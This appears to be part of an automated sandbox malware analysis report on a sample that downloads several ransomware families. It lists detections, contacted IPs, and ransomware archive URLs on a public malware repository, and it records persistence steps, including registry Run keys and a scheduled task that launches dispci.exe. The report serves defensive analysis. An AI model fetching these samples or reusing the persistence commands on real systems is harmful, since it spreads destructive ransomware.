8.0.Endermanch@Birele.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.Endermanch@Birele.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.0.Endermanch@Birele.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.0.Endermanch@Birele.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.0.Endermanch@Birele.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
19.0.Endermanch@Cerber5.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
19.2.Endermanch@Cerber5.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
19.0.Endermanch@Cerber5.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
10.2.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
1.0.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
4.0.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
58.0.Endermanch@Cerber5.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
19.0.Endermanch@Cerber5.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
47.2.rundll32.exe.4200000.1.unpack	100%	Avira	HEUR/AGEN.1234590	Download File
3.2.rundll32.exe.7b0000.2.unpack	100%	Avira	HEUR/AGEN.1234590	Download File
10.0.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
58.0.Endermanch@Cerber5.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
49.0.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
32.0.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
38.0.Endermanch@Birele.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
19.2.Endermanch@Cerber5.exe.5e70000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
1.0.Endermanch@BadRabbit.exe.1320000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
40.0.Endermanch@Cerber5.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
55.0.Endermanch@Birele.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.rundll32.exe.4220000.1.unpack	100%	Avira	HEUR/AGEN.1234590	Download File
32.0.Endermanch@BadRabbit.exe.1320000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
38.0.Endermanch@Birele.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.0.Endermanch@BadRabbit.exe.1320000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
49.2.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
55.0.Endermanch@Birele.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.Endermanch@Birele.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
58.2.Endermanch@Cerber5.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
40.2.Endermanch@Cerber5.exe.4dc0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.Endermanch@BadRabbit.exe.1320000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
19.2.Endermanch@Cerber5.exe.1720000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
55.0.Endermanch@Birele.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
49.0.Endermanch@BadRabbit.exe.1320000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
40.0.Endermanch@Cerber5.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
58.0.Endermanch@Cerber5.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
1.2.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
raw.githubusercontent.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip	0%	Avira URL Cloud	safe
http://wallup.nethttp://wallup.nethttp://wallup.net	0%	Avira URL Cloud	safe
http://192.168.2.1/	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip	0%	Virustotal		Browse
http://poetry.rotten.com/lightning/	0%	Virustotal		Browse
http://192.168.2.1/c	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip	0%	Virustotal		Browse
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip	0%	Avira URL Cloud	safe
http://poetry.rotten.com/lightning/	0%	Avira URL Cloud	safe
http://192.168.2.1/;	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip	0%	Avira URL Cloud	safe
http://btc.blo	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip	0%	Avira URL Cloud	safe
http://192.168.2.1/5	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip	0%	Avira URL Cloud	safe
http://api.blo	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
github.com	140.82.121.4	true	false		high
raw.githubusercontent.com	185.199.108.133	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip	false		high
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip	false		high
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip	false	Avira URL Cloud: safe	unknown
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip	false		high
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip	false		high
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip	false	Avira URL Cloud: safe	unknown
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip	false		high
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip	false		high
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip	false	Avira URL Cloud: safe	unknown
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip	false		high
https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip	false	Avira URL Cloud: safe	unknown
https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://poetry.rotten.com/lightning/	Endermanch@Krotten.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000036.00000003.390242808.0000028260047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.torproject.org/download/download-easy.html.en	Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.torproject.org/	Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.472553764.00000000063C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000036.00000002.409546838.0000028260042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.391639862.0000028260041000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000036.00000003.389098362.000002826005C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wallup.nethttp://wallup.nethttp://wallup.net	Endermanch@DeriaLock.exe, 0000002C.00000000.315117321.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000036.00000002.409546838.0000028260042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.391639862.0000028260041000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	false		high
http://192.168.2.1/	rundll32.exe, 00000003.00000003.307238763.00000000041F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.168.2.1/c	rundll32.exe, 00000003.00000003.307613012.0000000000505000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 00000036.00000002.404447518.0000028260013000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://diskcryptor.net/	rundll32.exe, 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, dispci.exe.3.dr, cscc.dat.3.dr	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.168.2.1/;	rundll32.exe, 00000003.00000002.333362990.0000000000504000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000036.00000003.391384207.0000028260045000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000036.00000003.391384207.0000028260045000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8	Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wallup.net	Endermanch@DeriaLock.exe, 0000002C.00000000.315117321.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	false		high
http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/	Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.404447518.0000028260013000.00000004.00000020.00020000.00000000.sdmp	false		high
http://btc.blo	Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000036.00000003.390242808.0000028260047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.168.2.1/5	rundll32.exe, 00000003.00000002.333362990.0000000000504000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.baidu.com	Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.torproject.org/download/download-easy.html.en	Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt	Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	false		high
http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe	Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	false		high
https://dynamic.t	svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409502792.000002826003A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/results?search_query=Install	Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.blo	Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000036.00000003.389098362.000002826005C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
87.98.177.219	unknown	France	16276	OVHFR	false
87.98.177.218	unknown	France	16276	OVHFR	false
87.98.177.215	unknown	France	16276	OVHFR	false
87.98.177.214	unknown	France	16276	OVHFR	false
87.98.177.217	unknown	France	16276	OVHFR	false
87.98.177.216	unknown	France	16276	OVHFR	false
87.98.177.211	unknown	France	16276	OVHFR	false
87.98.177.210	unknown	France	16276	OVHFR	false
87.98.177.213	unknown	France	16276	OVHFR	false
87.98.177.212	unknown	France	16276	OVHFR	false
23.50.106.206	unknown	United States	16625	AKAMAI-ASUS	true
87.98.177.208	unknown	France	16276	OVHFR	false
87.98.177.207	unknown	France	16276	OVHFR	false
87.98.177.209	unknown	France	16276	OVHFR	false
87.98.177.204	unknown	France	16276	OVHFR	false
87.98.177.203	unknown	France	16276	OVHFR	false
87.98.177.206	unknown	France	16276	OVHFR	false
87.98.177.205	unknown	France	16276	OVHFR	false
87.98.177.200	unknown	France	16276	OVHFR	false
87.98.177.202	unknown	France	16276	OVHFR	false
87.98.177.201	unknown	France	16276	OVHFR	false
87.98.177.2	unknown	France	16276	OVHFR	false
87.98.177.1	unknown	France	16276	OVHFR	false
87.98.177.4	unknown	France	16276	OVHFR	false
87.98.177.3	unknown	France	16276	OVHFR	false
87.98.177.0	unknown	France	16276	OVHFR	false
87.98.177.9	unknown	France	16276	OVHFR	false
87.98.177.6	unknown	France	16276	OVHFR	false
87.98.177.5	unknown	France	16276	OVHFR	false
87.98.177.8	unknown	France	16276	OVHFR	false
87.98.177.7	unknown	France	16276	OVHFR	false
95.1.200.1	unknown	Turkey	9121	TTNETTR	false
87.98.177.237	unknown	France	16276	OVHFR	false
95.1.200.2	unknown	Turkey	9121	TTNETTR	false
87.98.177.236	unknown	France	16276	OVHFR	false
87.98.177.239	unknown	France	16276	OVHFR	false
95.1.200.0	unknown	Turkey	9121	TTNETTR	false
87.98.177.238	unknown	France	16276	OVHFR	false
95.1.200.5	unknown	Turkey	9121	TTNETTR	false
87.98.177.233	unknown	France	16276	OVHFR	false
95.1.200.6	unknown	Turkey	9121	TTNETTR	false
87.98.177.232	unknown	France	16276	OVHFR	false
95.1.200.3	unknown	Turkey	9121	TTNETTR	false
87.98.177.235	unknown	France	16276	OVHFR	false
95.1.200.4	unknown	Turkey	9121	TTNETTR	false
87.98.177.234	unknown	France	16276	OVHFR	false
95.1.200.9	unknown	Turkey	9121	TTNETTR	false
95.1.200.7	unknown	Turkey	9121	TTNETTR	false
87.98.177.231	unknown	France	16276	OVHFR	false
95.1.200.8	unknown	Turkey	9121	TTNETTR	false
87.98.177.230	unknown	France	16276	OVHFR	false
87.98.178.249	unknown	France	16276	OVHFR	false
87.98.178.248	unknown	France	16276	OVHFR	false
87.98.178.247	unknown	France	16276	OVHFR	false
87.98.178.246	unknown	France	16276	OVHFR	false
87.98.179.97	unknown	France	16276	OVHFR	false
87.98.179.96	unknown	France	16276	OVHFR	false
87.98.179.99	unknown	France	16276	OVHFR	false
87.98.179.98	unknown	France	16276	OVHFR	false
87.98.178.241	unknown	France	16276	OVHFR	false
87.98.179.93	unknown	France	16276	OVHFR	false
87.98.178.240	unknown	France	16276	OVHFR	false
87.98.179.92	unknown	France	16276	OVHFR	false
87.98.179.95	unknown	France	16276	OVHFR	false
87.98.179.94	unknown	France	16276	OVHFR	false
87.98.178.245	unknown	France	16276	OVHFR	false
87.98.178.244	unknown	France	16276	OVHFR	false
87.98.178.243	unknown	France	16276	OVHFR	false
87.98.179.91	unknown	France	16276	OVHFR	false
87.98.178.242	unknown	France	16276	OVHFR	false
87.98.179.90	unknown	France	16276	OVHFR	false
87.98.177.229	unknown	France	16276	OVHFR	false
87.98.177.226	unknown	France	16276	OVHFR	false
87.98.177.225	unknown	France	16276	OVHFR	false
87.98.177.228	unknown	France	16276	OVHFR	false
87.98.177.227	unknown	France	16276	OVHFR	false
87.98.177.222	unknown	France	16276	OVHFR	false
87.98.177.221	unknown	France	16276	OVHFR	false
87.98.177.224	unknown	France	16276	OVHFR	false
87.98.177.223	unknown	France	16276	OVHFR	false
87.98.177.220	unknown	France	16276	OVHFR	false
87.98.178.252	unknown	France	16276	OVHFR	false
87.98.178.251	unknown	France	16276	OVHFR	false
87.98.178.250	unknown	France	16276	OVHFR	false
87.98.178.255	unknown	France	16276	OVHFR	false
87.98.178.254	unknown	France	16276	OVHFR	false
87.98.178.253	unknown	France	16276	OVHFR	false
93.107.12.20	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.21	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.22	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.23	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.24	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.25	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.26	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.27	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.28	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
93.107.12.29	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
87.98.178.227	unknown	France	16276	OVHFR	false
87.98.179.79	unknown	France	16276	OVHFR	false
87.98.178.226	unknown	France	16276	OVHFR	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	712619
Start date and time:	2022-09-29 14:48:45 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	irH9zMhZub.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	67
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.rans.spre.troj.expl.evad.winEXE@123/23@2/100
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 44.7% (good quality ratio 41.1%) Quality average: 76.7% Quality standard deviation: 30.6%
HCA Information:	Successful, ratio: 99% Number of executed functions: 167 Number of non-executed functions: 148
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Connection to analysis system has been lost, crash info: Unknown
Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, arizonacode.bplaced.net, powertoolsforyou.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:50:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
14:50:08	Task Scheduler	Run new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit
14:50:09	API Interceptor	2x Sleep call for process: rundll32.exe modified
14:50:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
14:50:23	API Interceptor	1x Sleep call for process: Endermanch@Cerber5.exe modified
14:50:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe
14:51:27	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\WINDOWS\Web\rundll32.exe
14:52:21	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AVPCC C:\WINDOWS\Cursors\avp.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
87.98.177.219	4W5dQXszUV.exe	Get hash	malicious	Browse
	Endermanch@Cerber5.exe	Get hash	malicious	Browse
	PVnucZb2tL.exe	Get hash	malicious	Browse
	z8ySigOk82.exe	Get hash	malicious	Browse
	9d4hX4Vbp6.exe	Get hash	malicious	Browse
	lBIQ1GrMtQ.exe	Get hash	malicious	Browse
	w5i1A42WqU.exe	Get hash	malicious	Browse
	zflfugI5Gb.exe	Get hash	malicious	Browse
	nULRfcO96q.exe	Get hash	malicious	Browse
	SWDDFWICq4.exe	Get hash	malicious	Browse
	14001.doc	Get hash	malicious	Browse
87.98.177.218	4W5dQXszUV.exe	Get hash	malicious	Browse
	Endermanch@Cerber5.exe	Get hash	malicious	Browse
	PVnucZb2tL.exe	Get hash	malicious	Browse
	z8ySigOk82.exe	Get hash	malicious	Browse
	9d4hX4Vbp6.exe	Get hash	malicious	Browse
	lBIQ1GrMtQ.exe	Get hash	malicious	Browse
	w5i1A42WqU.exe	Get hash	malicious	Browse
	zflfugI5Gb.exe	Get hash	malicious	Browse
	nULRfcO96q.exe	Get hash	malicious	Browse
	SWDDFWICq4.exe	Get hash	malicious	Browse
	14001.doc	Get hash	malicious	Browse
87.98.177.215	4W5dQXszUV.exe	Get hash	malicious	Browse
	Endermanch@Cerber5.exe	Get hash	malicious	Browse
	PVnucZb2tL.exe	Get hash	malicious	Browse
	z8ySigOk82.exe	Get hash	malicious	Browse
	9d4hX4Vbp6.exe	Get hash	malicious	Browse
	lBIQ1GrMtQ.exe	Get hash	malicious	Browse
	w5i1A42WqU.exe	Get hash	malicious	Browse
	zflfugI5Gb.exe	Get hash	malicious	Browse
	nULRfcO96q.exe	Get hash	malicious	Browse
	SWDDFWICq4.exe	Get hash	malicious	Browse

Domains

